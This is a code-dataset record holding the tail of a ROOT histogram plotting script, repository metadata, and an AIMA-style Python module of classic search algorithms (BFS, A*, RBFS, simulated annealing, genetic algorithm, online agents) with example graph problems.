# Undo the x40 scaling applied to the duplicate histogram earlier.
dupcut[0].Scale(1./40.)
print dupcut[0].GetEntries(),dupcut[1].GetEntries()
leg1 = TLegend(0.6,0.5,0.88,0.85)
leg1.SetFillColor(kWhite)
leg1.AddEntry(comcut[0],"no cuts","l")
# Combinatorics cut flow.
comcut[0].Draw()
ct = comcut[0].GetEntries()
for k,v in enumerate(comcut):
    print v.GetEntries()/ct
    if k != 0:
        v.SetLineColor(kBlue+k-3)
        leg1.AddEntry(v,cuthistos[k-1],"l")
        v.Draw("same")
leg1.Draw()
c.SaveAs("comb_cutFlow.eps")
c.Clear()
# Duplicates cut flow (reuses the legend built above).
dupcut[0].Draw()
dt = dupcut[0].GetEntries()
for k,v in enumerate(dupcut):
    print v.GetEntries()/dt
    if k == 0:
        v.Draw()
    if k != 0:
        v.SetLineColor(kBlue+k-3)
        v.Draw("same")
leg1.Draw()
c.SaveAs("dup_cutFlow.eps")
# Duplicate/combinatoric ratio after each cut level.
for k,v in enumerate(dupcut):
    r = v.Clone("r"+str(k))
    print k,v.GetName(),r.GetName(),v.GetEntries(),r.GetEntries()
    r.SetDirectory(0)
    r.Divide(comcut[k])
    r.SetLineWidth(2)
    #if k == 0: r.Draw()
    ratios.append(r)
ratios[0].SetLineColor(kRed)
ratios[0].Draw()
ratios[0].GetYaxis().SetRangeUser(1e-5,10.0)
for k,r in enumerate(ratios):
    r.Draw("same")
leg1.Draw()
c.SaveAs("cutFlow.eps")
c.Clear()
# Prepared 3x2 multi-pad canvas; unused in the visible remainder.
c5 = TCanvas("c5","",1000,600)
c5.Divide(3,2)
|
[
"mwalker@physics.rutgers.edu"
] |
mwalker@physics.rutgers.edu
|
b36d283c557e9b5a5197b3e3541c79aeba07b8f3
|
42908ab1561e43edd9cca0d9347f34ab67170b48
|
/search.py
|
bda1eaad1243ce1e15d2f7822c32884b6df4897b
|
[] |
no_license
|
PATX0/SolitaireGame
|
9931a88664b7e46de5595b4ac0d35ad96d68ec7f
|
052dc8da4c73ae2cbcb39e39c7f9221ea635c1ad
|
refs/heads/master
| 2020-03-30T17:10:07.390291
| 2018-10-26T18:40:49
| 2018-10-26T18:40:49
| 151,444,050
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46,738
|
py
|
"""Search (Chapters 3-4)
The way to use this code is to subclass Problem to create a class of problems,
then create problem instances and solve them with calls to the various search
functions."""
from utils import (
is_in, argmin, argmax, argmax_random_tie, probability, weighted_sampler,
memoize, print_table, open_data, Stack, FIFOQueue, PriorityQueue, name,
distance
)
from collections import defaultdict
import math
import random
import sys
import bisect
infinity = float('inf')
# ______________________________________________________________________________
class Problem(object):
    """Base class for formal problems.

    Subclass it and implement `actions` and `result` (and, if needed,
    `__init__`, `goal_test`, and `path_cost`), then hand instances to the
    search functions in this module.
    """

    def __init__(self, initial, goal=None):
        """Record the initial state and, when the problem has a unique
        goal, the goal state. Subclass constructors may add arguments."""
        self.initial = initial
        self.goal = goal

    def actions(self, state):
        """The actions executable in *state* — typically a list, but an
        iterator is preferable when there are very many actions."""
        raise NotImplementedError

    def result(self, state, action):
        """The state reached by applying *action* (which must come from
        self.actions(state)) in *state*."""
        raise NotImplementedError

    def goal_test(self, state):
        """Whether *state* is a goal.

        Default behavior: identity-membership when self.goal is a list,
        plain equality otherwise. Override when a single goal comparison
        is not enough.
        """
        if isinstance(self.goal, list):
            return is_in(state, self.goal)
        return state == self.goal

    def path_cost(self, c, state1, action, state2):
        """Cost of a solution path arriving at *state2* from *state1*
        via *action*, given accumulated cost *c* up to *state1*.
        Default: every step costs 1, so only *c* matters."""
        return c + 1

    def value(self, state):
        """Value of *state*, for optimization searches such as
        hill-climbing that try to maximize it."""
        raise NotImplementedError
# ______________________________________________________________________________
class Node:
    """A search-tree node.

    Holds the state, a pointer to the parent node, the action that
    produced it, and the accumulated path cost g. Depth is derived from
    the parent. Search algorithms may attach extra attributes (f, h).
    Two nodes with the same state compare equal, so frontier/explored
    bookkeeping treats repeated states as duplicates.
    """

    def __init__(self, state, parent=None, action=None, path_cost=0):
        """Build a node reached from *parent* by *action*."""
        self.state = state
        self.parent = parent
        self.action = action
        self.path_cost = path_cost
        self.depth = parent.depth + 1 if parent else 0

    def __repr__(self):
        return "<Node {}>".format(self.state)

    def __lt__(self, node):
        return self.state < node.state

    def expand(self, problem):
        """All nodes reachable in one step from this node."""
        children = []
        for action in problem.actions(self.state):
            children.append(self.child_node(problem, action))
        return children

    def child_node(self, problem, action):
        """[Figure 3.10] The child node reached by applying *action*."""
        next_state = problem.result(self.state, action)
        cost = problem.path_cost(self.path_cost, self.state,
                                 action, next_state)
        return Node(next_state, self, action, cost)

    def solution(self):
        """The action sequence from the root to this node."""
        return [n.action for n in self.path()[1:]]

    def path(self):
        """The node sequence from the root down to this node."""
        chain = []
        node = self
        while node:
            chain.append(node)
            node = node.parent
        chain.reverse()
        return chain

    # Equality/hash by state only (see class docstring).
    def __eq__(self, other):
        return isinstance(other, Node) and self.state == other.state

    def __hash__(self):
        return hash(self.state)
# ______________________________________________________________________________
class SimpleProblemSolvingAgentProgram:
    """Abstract framework for a problem-solving agent. [Figure 3.1]

    `state` is an abstract representation of the world; `seq` is the
    pending list of actions, produced by search, leading from the
    initial state to the current goal.
    """

    def __init__(self, initial_state=None):
        """Start with the given world state and an empty plan."""
        self.state = initial_state
        self.seq = []

    def __call__(self, percept):
        """[Figure 3.1] Fold the percept into the state; when the plan is
        exhausted, formulate a new goal and problem and search for a
        fresh plan. Returns the next action, or None if search failed."""
        self.state = self.update_state(self.state, percept)
        if not self.seq:
            goal = self.formulate_goal(self.state)
            problem = self.formulate_problem(self.state, goal)
            self.seq = self.search(problem)
            if not self.seq:
                return None
        return self.seq.pop(0)

    # NOTE(review): __call__ invokes update_state(self.state, percept)
    # with two positional arguments, so overrides must accept
    # (state, percept) — this stub's narrower signature looks stale.
    def update_state(self, percept):
        raise NotImplementedError

    def formulate_goal(self, state):
        raise NotImplementedError

    def formulate_problem(self, state, goal):
        raise NotImplementedError

    def search(self, problem):
        raise NotImplementedError
# ______________________________________________________________________________
# Uninformed Search algorithms
def tree_search(problem, frontier):
    """Generic tree search [Figure 3.7].

    Pops nodes from *frontier* (an empty queue supplied by the caller —
    its pop order defines the strategy) and expands them until a goal
    node is found. Repeated paths to the same state are NOT detected.
    Returns the goal node, or None when the frontier empties.
    """
    frontier.append(Node(problem.initial))
    while frontier:
        current = frontier.pop()
        if problem.goal_test(current.state):
            return current
        frontier.extend(current.expand(problem))
    return None
def graph_search(problem, frontier):
    """Generic graph search [Figure 3.7].

    Like `tree_search`, but remembers explored states so each state is
    expanded at most once; only the first path found to a state is kept.
    *frontier* must be an empty queue; its pop order sets the strategy.
    Returns the goal node, or None when the frontier empties.
    """
    frontier.append(Node(problem.initial))
    explored = set()
    while frontier:
        current = frontier.pop()
        if problem.goal_test(current.state):
            return current
        explored.add(current.state)
        # Lazily filter children so frontier membership is re-checked as
        # each one is appended.
        frontier.extend(child for child in current.expand(problem)
                        if child.state not in explored and
                        child not in frontier)
    return None
def breadth_first_tree_search(problem):
    """Search the shallowest nodes in the search tree first.

    Tree search (no duplicate-state detection) with a FIFO frontier.
    """
    return tree_search(problem, FIFOQueue())
def depth_first_tree_search(problem):
    """Search the deepest nodes in the search tree first.

    Tree search (no duplicate-state detection) with a LIFO frontier.
    """
    return tree_search(problem, Stack())
def depth_first_graph_search(problem):
    """Search the deepest nodes in the search tree first.

    Graph search (explored-set duplicate detection) with a LIFO frontier.
    """
    return graph_search(problem, Stack())
def breadth_first_search(problem):
    """Breadth-first graph search [Figure 3.11].

    Applies the goal test when a node is *generated* (not when popped),
    which is safe for BFS and finds the goal one level earlier.
    Returns the goal node, or None if the frontier empties.
    """
    root = Node(problem.initial)
    if problem.goal_test(root.state):
        return root
    frontier = FIFOQueue()
    frontier.append(root)
    explored = set()
    while frontier:
        parent = frontier.pop()
        explored.add(parent.state)
        for child in parent.expand(problem):
            if child.state in explored or child in frontier:
                continue
            if problem.goal_test(child.state):
                return child
            frontier.append(child)
    return None
def best_first_graph_search(problem, f):
    """Search the nodes with the lowest f scores first.
    You specify the function f(node) that you want to minimize; for example,
    if f is a heuristic estimate to the goal, then we have greedy best
    first search; if f is node.depth then we have breadth-first search.
    There is a subtlety: the line "f = memoize(f, 'f')" means that the f
    values will be cached on the nodes as they are computed. So after doing
    a best first search you can examine the f values of the path returned."""
    f = memoize(f, 'f')
    node = Node(problem.initial)
    if problem.goal_test(node.state):
        return node
    # Min-priority queue ordered by f (PriorityQueue from utils).
    frontier = PriorityQueue(min, f)
    frontier.append(node)
    explored = set()
    while frontier:
        node = frontier.pop()
        # Goal test on pop, so the returned node has the lowest f seen.
        if problem.goal_test(node.state):
            return node
        explored.add(node.state)
        for child in node.expand(problem):
            if child.state not in explored and child not in frontier:
                frontier.append(child)
            elif child in frontier:
                # A cheaper path to a state already on the frontier
                # replaces the incumbent entry.
                incumbent = frontier[child]
                if f(child) < f(incumbent):
                    del frontier[incumbent]
                    frontier.append(child)
    # Frontier exhausted without reaching a goal.
    return None
def uniform_cost_search(problem):
    """[Figure 3.14] Best-first graph search ordered by path cost g(n)."""
    return best_first_graph_search(problem, lambda node: node.path_cost)
def depth_limited_search(problem, limit=50):
    """Depth-limited DFS [Figure 3.17].

    Returns the goal node, None when the tree below the limit holds no
    goal, or the string 'cutoff' when the limit truncated the search.
    """
    def _dls(node, depth_left):
        # One-step recursive helper carrying the remaining depth budget.
        if problem.goal_test(node.state):
            return node
        if depth_left == 0:
            return 'cutoff'
        hit_cutoff = False
        for child in node.expand(problem):
            outcome = _dls(child, depth_left - 1)
            if outcome == 'cutoff':
                hit_cutoff = True
            elif outcome is not None:
                return outcome
        return 'cutoff' if hit_cutoff else None

    return _dls(Node(problem.initial), limit)
def iterative_deepening_search(problem):
    """Iterative-deepening DFS [Figure 3.18].

    Runs depth_limited_search with an ever-growing limit until the
    result is no longer 'cutoff' (a goal node, or None for failure).
    """
    depth = 0
    while depth < sys.maxsize:
        outcome = depth_limited_search(problem, depth)
        if outcome != 'cutoff':
            return outcome
        depth += 1
# ______________________________________________________________________________
# Bidirectional Search
# Pseudocode from https://webdocs.cs.ualberta.ca/%7Eholte/Publications/MM-AAAI2016.pdf
def bidirectional_search(problem):
    """MM bidirectional search (Holte et al., AAAI 2016).

    Searches forward from problem.initial and backward from problem.goal,
    meeting in the middle; returns the best path cost found (U), or
    infinity on failure. Requires problem.find_min_edge() and problem.h().
    """
    e = problem.find_min_edge()
    # g-costs, open lists, and closed lists for the two directions.
    gF, gB = {problem.initial : 0}, {problem.goal : 0}
    openF, openB = [problem.initial], [problem.goal]
    closedF, closedB = [], []
    U = infinity
    def extend(U, open_dir, open_other, g_dir, g_other, closed_dir):
        """Extend search in given direction"""
        # C is the priority chosen in the enclosing loop this iteration.
        n = find_key(C, open_dir, g_dir)
        open_dir.remove(n)
        closed_dir.append(n)
        for c in problem.actions(n):
            if c in open_dir or c in closed_dir:
                # Skip unless the new path to c is strictly cheaper.
                if g_dir[c] <= problem.path_cost(g_dir[n], n, None, c):
                    continue
                # NOTE(review): if c is only in closed_dir this remove()
                # raises ValueError (c is not in open_dir) — confirm
                # against the MM paper's pseudocode.
                open_dir.remove(c)
            g_dir[c] = problem.path_cost(g_dir[n], n, None, c)
            open_dir.append(c)
            if c in open_other:
                # Frontiers met: record the best combined path cost.
                U = min(U, g_dir[c] + g_other[c])
        return U, open_dir, closed_dir, g_dir
    def find_min(open_dir, g):
        """Finds minimum priority, g and f values in open_dir"""
        m, m_f = infinity, infinity
        for n in open_dir:
            f = g[n] + problem.h(n)
            # MM priority: pr(n) = max(f(n), 2*g(n)).
            pr = max(f, 2*g[n])
            m = min(m, pr)
            m_f = min(m_f, f)
        return m, m_f, min(g.values())
    def find_key(pr_min, open_dir, g):
        """Finds key in open_dir with value equal to pr_min
        and minimum g value."""
        m = infinity
        state = -1
        for n in open_dir:
            pr = max(g[n] + problem.h(n), 2*g[n])
            if pr == pr_min:
                if g[n] < m:
                    m = g[n]
                    state = n
        return state
    while openF and openB:
        pr_min_f, f_min_f, g_min_f = find_min(openF, gF)
        pr_min_b, f_min_b, g_min_b = find_min(openB, gB)
        C = min(pr_min_f, pr_min_b)
        # Termination: current best meeting cost U cannot be improved.
        if U <= max(C, f_min_f, f_min_b, g_min_f + g_min_b + e):
            return U
        if C == pr_min_f:
            # Extend forward
            U, openF, closedF, gF = extend(U, openF, openB, gF, gB, closedF)
        else:
            # Extend backward
            U, openB, closedB, gB = extend(U, openB, openF, gB, gF, closedB)
    return infinity
# ______________________________________________________________________________
# Informed (Heuristic) Search
# Alias: greedy best-first search is just best-first graph search where
# the caller supplies the heuristic as the evaluation function.
greedy_best_first_graph_search = best_first_graph_search
# Greedy best-first search is accomplished by specifying f(n) = h(n).
def astar_search(problem, h=None):
    """A* search: best-first graph search with f(n) = g(n) + h(n).

    Pass the heuristic *h* here, or define it on the Problem subclass.
    Its values are memoized on each node's 'h' attribute.
    """
    heuristic = memoize(h or problem.h, 'h')
    return best_first_graph_search(
        problem, lambda node: node.path_cost + heuristic(node))
def greedy_search(problem, h=None):
    """Greedy best-first search: f(n) = h(n).

    Pass the heuristic *h* here, or define it on the Problem subclass.
    """
    heuristic = memoize(h or problem.h, 'h')
    return best_first_graph_search(problem, heuristic)
# ______________________________________________________________________________
# Other search algorithms
def recursive_best_first_search(problem, h=None):
    """[Figure 3.26] RBFS: linear-space best-first search.

    Recurses along the best child while tracking the f-value of the best
    alternative path (flimit); backs up the best leaf f on return.
    """
    h = memoize(h or problem.h, 'h')
    def RBFS(problem, node, flimit):
        # Returns (solution_node_or_None, backed-up best f).
        if problem.goal_test(node.state):
            return node, 0   # (The second value is immaterial)
        successors = node.expand(problem)
        if len(successors) == 0:
            return None, infinity
        for s in successors:
            # Pathmax: a child's f never drops below its parent's.
            s.f = max(s.path_cost + h(s), node.f)
        while True:
            # Order by lowest f value
            successors.sort(key=lambda x: x.f)
            best = successors[0]
            if best.f > flimit:
                # Best option exceeds the alternative path: back up.
                return None, best.f
            if len(successors) > 1:
                alternative = successors[1].f
            else:
                alternative = infinity
            result, best.f = RBFS(problem, best, min(flimit, alternative))
            if result is not None:
                return result, best.f
    node = Node(problem.initial)
    node.f = h(node)
    result, bestf = RBFS(problem, node, infinity)
    return result
def hill_climbing(problem):
    """Steepest-ascent hill climbing [Figure 4.2].

    Repeatedly moves to the highest-valued neighbor (ties broken at
    random); stops when no neighbor improves on the current state.
    Returns the final state, not a node.
    """
    current = Node(problem.initial)
    while True:
        candidates = current.expand(problem)
        if not candidates:
            break
        best = argmax_random_tie(
            candidates, key=lambda n: problem.value(n.state))
        if problem.value(best.state) <= problem.value(current.state):
            break
        current = best
    return current.state
def exp_schedule(k=20, lam=0.005, limit=100):
    """Exponential-decay temperature schedule for simulated annealing.

    Returns a function t -> k * e^(-lam*t) for t < limit, and 0 after.
    """
    def schedule(t):
        if t < limit:
            return k * math.exp(-lam * t)
        return 0
    return schedule
def simulated_annealing(problem, schedule=exp_schedule()):
    """Simulated annealing [Figure 4.5].

    CAUTION: unlike the pseudocode this returns a *state*, not a Node.
    At each step a random neighbor is taken if it improves the value,
    or otherwise with probability e^(delta/T); stops when T reaches 0
    or there are no neighbors.
    """
    current = Node(problem.initial)
    t = 0
    while t < sys.maxsize:
        T = schedule(t)
        if T == 0:
            return current.state
        moves = current.expand(problem)
        if not moves:
            return current.state
        candidate = random.choice(moves)
        delta = problem.value(candidate.state) - problem.value(current.state)
        # Short-circuit keeps the probability() draw to downhill moves only.
        if delta > 0 or probability(math.exp(delta / T)):
            current = candidate
        t += 1
def and_or_graph_search(problem):
    """AND-OR graph search [Figure 4.11].

    For nondeterministic, fully observable environments: at an OR node
    the agent picks any one action; each action leads to an AND node of
    all states the environment might produce, every one of which must be
    handled. Returns a conditional plan — [action, {state: subplan}] —
    or None when no plan reaches the goal.
    """
    def _or_search(state, path):
        """Plan (list of action + contingency dict) from *state*, or None."""
        if problem.goal_test(state):
            return []
        if state in path:
            return None   # cycle: give up on this branch
        extended = path + [state]
        for action in problem.actions(state):
            subplan = _and_search(problem.result(state, action), extended)
            if subplan is not None:
                return [action, subplan]
        return None

    def _and_search(states, path):
        """Contingency dict {s: plan} covering every possible outcome,
        or None if any outcome is unsolvable."""
        plan = {}
        for s in states:
            plan[s] = _or_search(s, path)
            if plan[s] is None:
                return None
        return plan

    return _or_search(problem.initial, [])
class PeakFindingProblem(Problem):
    """Find the highest value in a bounded 2-D grid.

    States are (row, col) index tuples into `grid`; moves are the four
    compass directions, clipped at the grid edges.
    """

    def __init__(self, initial, grid):
        """*grid* is a non-empty 2-D list; *initial* a (row, col) tuple."""
        Problem.__init__(self, initial)
        self.grid = grid
        self.n = len(grid)
        assert self.n > 0
        self.m = len(grid[0])
        assert self.m > 0

    def actions(self, state):
        """The compass moves that stay inside the grid.

        Order is always N, S, W, E (callers may rely on it).
        """
        # TODO: Add flag to allow diagonal motion
        row, col = state
        moves = []
        if row > 0:
            moves.append('N')
        if row < self.n - 1:
            moves.append('S')
        if col > 0:
            moves.append('W')
        if col < self.m - 1:
            moves.append('E')
        return moves

    def result(self, state, action):
        """The (row, col) reached by taking *action* from *state*."""
        row, col = state
        if action == 'N':
            row -= 1
        elif action == 'S':
            row += 1
        elif action == 'W':
            col -= 1
        elif action == 'E':
            col += 1
        return (row, col)

    def value(self, state):
        """The grid value stored at *state*."""
        row, col = state
        assert 0 <= row < self.n
        assert 0 <= col < self.m
        return self.grid[row][col]
class OnlineDFSAgent:
    """[Figure 4.21] The abstract class for an OnlineDFSAgent. Override
    update_state method to convert percept to state. While initializing
    the subclass a problem needs to be provided which is an instance of
    a subclass of the Problem class."""

    def __init__(self, problem):
        self.problem = problem
        self.s = None                          # previous state
        self.a = None                          # previous action
        self.untried = defaultdict(list)       # state -> actions not yet tried
        self.unbacktracked = defaultdict(list) # state -> predecessors to back up to
        self.result = {}                       # (state, action) -> observed next state

    def __call__(self, percept):
        """Observe a percept, update the exploration model, and return the
        next action (None once the goal is reached or nothing is left)."""
        s1 = self.update_state(percept)
        if self.problem.goal_test(s1):
            self.a = None
        else:
            if s1 not in self.untried.keys():
                self.untried[s1] = self.problem.actions(s1)
            if self.s is not None:
                # Record the observed transition and remember how to get back.
                # NOTE(review): on the first visit (self.s, self.a) is not yet
                # in self.result, so this lookup would raise KeyError — confirm
                # whether the guard should be a membership test instead.
                if s1 != self.result[(self.s, self.a)]:
                    self.result[(self.s, self.a)] = s1
                    self.unbacktracked[s1].insert(0, self.s)
            if len(self.untried[s1]) == 0:
                if len(self.unbacktracked[s1]) == 0:
                    # Nothing left to try and nowhere to backtrack: stop.
                    self.a = None
                else:
                    # else a <- an action b such that result[s', b] = POP(unbacktracked[s'])
                    unbacktracked_pop = self.unbacktracked[s1].pop(0)
                    for (s, b) in self.result.keys():
                        if self.result[(s, b)] == unbacktracked_pop:
                            self.a = b
                            break
            else:
                # Depth-first: take the next untried action from here.
                self.a = self.untried[s1].pop(0)
        self.s = s1
        return self.a

    def update_state(self, percept):
        """To be overridden in most cases. The default case
        assumes the percept to be of type state."""
        return percept
# ______________________________________________________________________________
class OnlineSearchProblem(Problem):
    """A problem solved by an agent *executing* actions rather than by
    pure computation, in a deterministic, fully observable environment.

    Backed by a graph object exposing `dict` (state -> {action: state})
    and `least_costs` (state -> optimal cost-to-goal).
    """

    def __init__(self, initial, goal, graph):
        self.initial = initial
        self.goal = goal
        self.graph = graph

    def actions(self, state):
        """The actions available in *state*, per the underlying graph."""
        return self.graph.dict[state].keys()

    def output(self, state, action):
        """The state reached by taking *action* in *state*."""
        return self.graph.dict[state][action]

    def h(self, state):
        """Least possible cost to reach a goal from *state*."""
        return self.graph.least_costs[state]

    def c(self, s, a, s1):
        """Cost estimate for moving from *s* to *s1*: unit cost."""
        return 1

    def update_state(self, percept):
        raise NotImplementedError

    def goal_test(self, state):
        """True exactly when *state* is the goal state."""
        return True if state == self.goal else False
class LRTAStarAgent:
""" [Figure 4.24]
Abstract class for LRTA*-Agent. A problem needs to be
provided which is an instanace of a subclass of Problem Class.
Takes a OnlineSearchProblem [Figure 4.23] as a problem.
"""
def __init__(self, problem):
self.problem = problem
# self.result = {} # no need as we are using problem.result
self.H = {}
self.s = None
self.a = None
def __call__(self, s1): # as of now s1 is a state rather than a percept
if self.problem.goal_test(s1):
self.a = None
return self.a
else:
if s1 not in self.H:
self.H[s1] = self.problem.h(s1)
if self.s is not None:
# self.result[(self.s, self.a)] = s1 # no need as we are using problem.output
# minimum cost for action b in problem.actions(s)
self.H[self.s] = min(self.LRTA_cost(self.s, b, self.problem.output(self.s, b),
self.H) for b in self.problem.actions(self.s))
# an action b in problem.actions(s1) that minimizes costs
self.a = argmin(self.problem.actions(s1),
key=lambda b: self.LRTA_cost(s1, b, self.problem.output(s1, b), self.H))
self.s = s1
return self.a
def LRTA_cost(self, s, a, s1, H):
"""Returns cost to move from state 's' to state 's1' plus
estimated cost to get to goal from s1."""
print(s, a, s1)
if s1 is None:
return self.problem.h(s)
else:
# sometimes we need to get H[s1] which we haven't yet added to H
# to replace this try, except: we can initialize H with values from problem.h
try:
return self.problem.c(s, a, s1) + self.H[s1]
except:
return self.problem.c(s, a, s1) + self.problem.h(s1)
# ______________________________________________________________________________
# Genetic Algorithm
def genetic_search(problem, fitness_fn, ngen=1000, pmut=0.1, n=20):
"""Call genetic_algorithm on the appropriate parts of a problem.
This requires the problem to have states that can mate and mutate,
plus a value method that scores states."""
# NOTE: This is not tested and might not work.
# TODO: Use this function to make Problems work with genetic_algorithm.
s = problem.initial_state
states = [problem.result(s, a) for a in problem.actions(s)]
random.shuffle(states)
return genetic_algorithm(states[:n], problem.value, ngen, pmut)
def genetic_algorithm(population, fitness_fn, gene_pool=[0, 1], f_thres=None, ngen=1000, pmut=0.1): # noqa
"""[Figure 4.8]"""
for i in range(ngen):
new_population = []
random_selection = selection_chances(fitness_fn, population)
for j in range(len(population)):
x = random_selection()
y = random_selection()
child = reproduce(x, y)
if random.uniform(0, 1) < pmut:
child = mutate(child, gene_pool)
new_population.append(child)
population = new_population
if f_thres:
fittest_individual = argmax(population, key=fitness_fn)
if fitness_fn(fittest_individual) >= f_thres:
return fittest_individual
return argmax(population, key=fitness_fn)
def init_population(pop_number, gene_pool, state_length):
"""Initializes population for genetic algorithm
pop_number : Number of individuals in population
gene_pool : List of possible values for individuals
state_length: The length of each individual"""
g = len(gene_pool)
population = []
for i in range(pop_number):
new_individual = [gene_pool[random.randrange(0, g)] for j in range(state_length)]
population.append(new_individual)
return population
def selection_chances(fitness_fn, population):
fitnesses = map(fitness_fn, population)
return weighted_sampler(population, fitnesses)
def reproduce(x, y):
n = len(x)
c = random.randrange(1, n)
return x[:c] + y[c:]
def mutate(x, gene_pool):
n = len(x)
g = len(gene_pool)
c = random.randrange(0, n)
r = random.randrange(0, g)
new_gene = gene_pool[r]
return x[:c] + [new_gene] + x[c+1:]
# _____________________________________________________________________________
# The remainder of this file implements examples for the search algorithms.
# ______________________________________________________________________________
# Graphs and Graph Problems
class Graph:
"""A graph connects nodes (verticies) by edges (links). Each edge can also
have a length associated with it. The constructor call is something like:
g = Graph({'A': {'B': 1, 'C': 2})
this makes a graph with 3 nodes, A, B, and C, with an edge of length 1 from
A to B, and an edge of length 2 from A to C. You can also do:
g = Graph({'A': {'B': 1, 'C': 2}, directed=False)
This makes an undirected graph, so inverse links are also added. The graph
stays undirected; if you add more links with g.connect('B', 'C', 3), then
inverse link is also added. You can use g.nodes() to get a list of nodes,
g.get('A') to get a dict of links out of A, and g.get('A', 'B') to get the
length of the link from A to B. 'Lengths' can actually be any object at
all, and nodes can be any hashable object."""
def __init__(self, dict=None, directed=True):
self.dict = dict or {}
self.directed = directed
if not directed:
self.make_undirected()
def make_undirected(self):
"""Make a digraph into an undirected graph by adding symmetric edges."""
for a in list(self.dict.keys()):
for (b, dist) in self.dict[a].items():
self.connect1(b, a, dist)
def connect(self, A, B, distance=1):
"""Add a link from A and B of given distance, and also add the inverse
link if the graph is undirected."""
self.connect1(A, B, distance)
if not self.directed:
self.connect1(B, A, distance)
def connect1(self, A, B, distance):
"""Add a link from A to B of given distance, in one direction only."""
self.dict.setdefault(A, {})[B] = distance
def get(self, a, b=None):
"""Return a link distance or a dict of {node: distance} entries.
.get(a,b) returns the distance or None;
.get(a) returns a dict of {node: distance} entries, possibly {}."""
links = self.dict.setdefault(a, {})
if b is None:
return links
else:
return links.get(b)
def nodes(self):
"""Return a list of nodes in the graph."""
return list(self.dict.keys())
def UndirectedGraph(dict=None):
"""Build a Graph where every edge (including future ones) goes both ways."""
return Graph(dict=dict, directed=False)
def RandomGraph(nodes=list(range(10)), min_links=2, width=400, height=300,
curvature=lambda: random.uniform(1.1, 1.5)):
"""Construct a random graph, with the specified nodes, and random links.
The nodes are laid out randomly on a (width x height) rectangle.
Then each node is connected to the min_links nearest neighbors.
Because inverse links are added, some nodes will have more connections.
The distance between nodes is the hypotenuse times curvature(),
where curvature() defaults to a random number between 1.1 and 1.5."""
g = UndirectedGraph()
g.locations = {}
# Build the cities
for node in nodes:
g.locations[node] = (random.randrange(width), random.randrange(height))
# Build roads from each city to at least min_links nearest neighbors.
for i in range(min_links):
for node in nodes:
if len(g.get(node)) < min_links:
here = g.locations[node]
def distance_to_node(n):
if n is node or g.get(node, n):
return infinity
return distance(g.locations[n], here)
neighbor = argmin(nodes, key=distance_to_node)
d = distance(g.locations[neighbor], here) * curvature()
g.connect(node, neighbor, int(d))
return g
""" [Figure 3.2]
Simplified road map of Romania
"""
romania_map = UndirectedGraph(dict(
Arad=dict(Zerind=75, Sibiu=140, Timisoara=118),
Bucharest=dict(Urziceni=85, Pitesti=101, Giurgiu=90, Fagaras=211),
Craiova=dict(Drobeta=120, Rimnicu=146, Pitesti=138),
Drobeta=dict(Mehadia=75),
Eforie=dict(Hirsova=86),
Fagaras=dict(Sibiu=99),
Hirsova=dict(Urziceni=98),
Iasi=dict(Vaslui=92, Neamt=87),
Lugoj=dict(Timisoara=111, Mehadia=70),
Oradea=dict(Zerind=71, Sibiu=151),
Pitesti=dict(Rimnicu=97),
Rimnicu=dict(Sibiu=80),
Urziceni=dict(Vaslui=142)))
romania_map.locations = dict(
Arad=(91, 492), Bucharest=(400, 327), Craiova=(253, 288),
Drobeta=(165, 299), Eforie=(562, 293), Fagaras=(305, 449),
Giurgiu=(375, 270), Hirsova=(534, 350), Iasi=(473, 506),
Lugoj=(165, 379), Mehadia=(168, 339), Neamt=(406, 537),
Oradea=(131, 571), Pitesti=(320, 368), Rimnicu=(233, 410),
Sibiu=(207, 457), Timisoara=(94, 410), Urziceni=(456, 350),
Vaslui=(509, 444), Zerind=(108, 531))
""" [Figure 4.9]
Eight possible states of the vacumm world
Each state is represented as
* "State of the left room" "State of the right room" "Room in which the agent
is present"
1 - DDL Dirty Dirty Left
2 - DDR Dirty Dirty Right
3 - DCL Dirty Clean Left
4 - DCR Dirty Clean Right
5 - CDL Clean Dirty Left
6 - CDR Clean Dirty Right
7 - CCL Clean Clean Left
8 - CCR Clean Clean Right
"""
vacumm_world = Graph(dict(
State_1=dict(Suck=['State_7', 'State_5'], Right=['State_2']),
State_2=dict(Suck=['State_8', 'State_4'], Left=['State_2']),
State_3=dict(Suck=['State_7'], Right=['State_4']),
State_4=dict(Suck=['State_4', 'State_2'], Left=['State_3']),
State_5=dict(Suck=['State_5', 'State_1'], Right=['State_6']),
State_6=dict(Suck=['State_8'], Left=['State_5']),
State_7=dict(Suck=['State_7', 'State_3'], Right=['State_8']),
State_8=dict(Suck=['State_8', 'State_6'], Left=['State_7'])
))
""" [Figure 4.23]
One-dimensional state space Graph
"""
one_dim_state_space = Graph(dict(
State_1=dict(Right='State_2'),
State_2=dict(Right='State_3', Left='State_1'),
State_3=dict(Right='State_4', Left='State_2'),
State_4=dict(Right='State_5', Left='State_3'),
State_5=dict(Right='State_6', Left='State_4'),
State_6=dict(Left='State_5')
))
one_dim_state_space.least_costs = dict(
State_1=8,
State_2=9,
State_3=2,
State_4=2,
State_5=4,
State_6=3)
""" [Figure 6.1]
Principal states and territories of Australia
"""
australia_map = UndirectedGraph(dict(
T=dict(),
SA=dict(WA=1, NT=1, Q=1, NSW=1, V=1),
NT=dict(WA=1, Q=1),
NSW=dict(Q=1, V=1)))
australia_map.locations = dict(WA=(120, 24), NT=(135, 20), SA=(135, 30),
Q=(145, 20), NSW=(145, 32), T=(145, 42),
V=(145, 37))
class GraphProblem(Problem):
"""The problem of searching a graph from one node to another."""
def __init__(self, initial, goal, graph):
Problem.__init__(self, initial, goal)
self.graph = graph
def actions(self, A):
"""The actions at a graph node are just its neighbors."""
return list(self.graph.get(A).keys())
def result(self, state, action):
"""The result of going to a neighbor is just that neighbor."""
return action
def path_cost(self, cost_so_far, A, action, B):
return cost_so_far + (self.graph.get(A, B) or infinity)
def find_min_edge(self):
"""Find minimum value of edges."""
m = infinity
for d in self.graph.dict.values():
local_min = min(d.values())
m = min(m, local_min)
return m
def h(self, node):
"""h function is straight-line distance from a node's state to goal."""
locs = getattr(self.graph, 'locations', None)
if locs:
if type(node) is str:
return int(distance(locs[node], locs[self.goal]))
return int(distance(locs[node.state], locs[self.goal]))
else:
return infinity
class GraphProblemStochastic(GraphProblem):
"""
A version of GraphProblem where an action can lead to
nondeterministic output i.e. multiple possible states.
Define the graph as dict(A = dict(Action = [[<Result 1>, <Result 2>, ...], <cost>], ...), ...)
A the dictionary format is different, make sure the graph is created as a directed graph.
"""
def result(self, state, action):
return self.graph.get(state, action)
def path_cost(self):
raise NotImplementedError
# ______________________________________________________________________________
